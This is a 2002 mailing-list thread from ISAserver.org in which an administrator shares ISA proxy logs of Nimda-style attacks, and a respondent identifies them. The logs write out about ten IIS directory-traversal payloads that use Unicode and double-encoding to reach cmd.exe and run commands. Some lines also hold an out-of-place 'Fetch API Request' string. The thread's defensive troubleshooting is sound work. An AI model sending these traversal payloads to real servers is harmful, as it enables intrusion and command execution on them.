Hi JIm I did not find these kind of entries in IIS logs and in ISA logs for other entries I find the source address as 10.3.x.x which is my INternal Network but for these entries containing the Scripts I find the Ip address coming from 202.x.x.x which are valid on the INternet, so iam getting these requests from Internet to my ISA. Is someone trying to send these scripts to My IIS behind ISA? I have scanned IIS and other servers of my network for Nimda but did not find anything. Regards, vinay. -----Original Message----- From: Jim Harrison [mailto:jim@xxxxxxxxxxxx] Sent: Tuesday, February 26, 2002 8:03 PM To: [ISAserver.org Discussion List] Subject: [isalist] Re: ISA logs. http://www.ISAserver.org Those are Nimda requests. Since the sc-result code is 401 for all of them, it appears that ISA may be allowing them to pass. "401" could be coming from ISA or the IIS service. What entries do you find in the IIS logs? Jim Harrison MCP(NT4, W2K), A+, Network+, PCG http://isaserver.org/authors/harrison/ Read the books! ----- Original Message ----- From: "Vinaykumar G" <G.Vinay@xxxxxxxxx> To: "[ISAserver.org Discussion List]" <isalist@xxxxxxxxxxxxx> Sent: Sunday, February 24, 2002 19:44 Subject: [isalist] ISA logs. http://www.ISAserver.org Hi Jim, This is what iam getting in the ISA logs and I have denoted xxx.xxx.xx.xx is pointing some valid IP on the Internet. Then if the IP is valid one on the Internet then these scripts are coming from internet. Please confirm as what has to be done to stop these scripts being executed. xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:04 w3proxy ISA - www - - - 145 3518 http TCP GET http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c. ./winnt/system32/cmd.exe?/c+dir - - 401 - - - xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:06 w3proxy ISA - www - - - 97 3518 http TCP GET http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir - - 401 - - - xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:08 w3proxy ISA - www - - - 97 3518 http TCP GET http://www/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir - - 401 - - - - - Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) Fetch API Request N 2002-02-23 05:57:08 w3proxy xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:10 w3proxy ISA - www - - - 97 3518 http TCP GET http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir - - 401 - - - - - Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) Fetch API Request N 2002-02-23 05:57:11 w3proxy anonymous - N 2002-02-23 05:57:11 w3proxy ISA - www - - - 97 3518 http TCP GET http://www/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir - - 401 - - - xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:13 w3proxy ISA - www - - - 98 3518 http TCP GET http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir - - 401 - - - xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:15 w3proxy ISA - www - - - 96 3518 http TCP GET http://www/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir - - 401 - - - - xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:17 w3proxy ISA - www - - - 100 3518 http TCP GET http://www/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir - - 401 - - - xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:19 w3proxy ISA - www - - - 96 3518 http TCP GET http://www/scripts/..%252f../winnt/system32/cmd.exe?/c+dir - - 401 - - - Regards, vinay. ------------------------------------------------------ You are currently subscribed to this ISAserver.org Discussion List as: jim@xxxxxxxxxxxx To unsubscribe send a blank email to $subst('Email.Unsub') ------------------------------------------------------ You are currently subscribed to this ISAserver.org Discussion List as: g.vinay@xxxxxxxxx To unsubscribe send a blank email to $subst('Email.Unsub')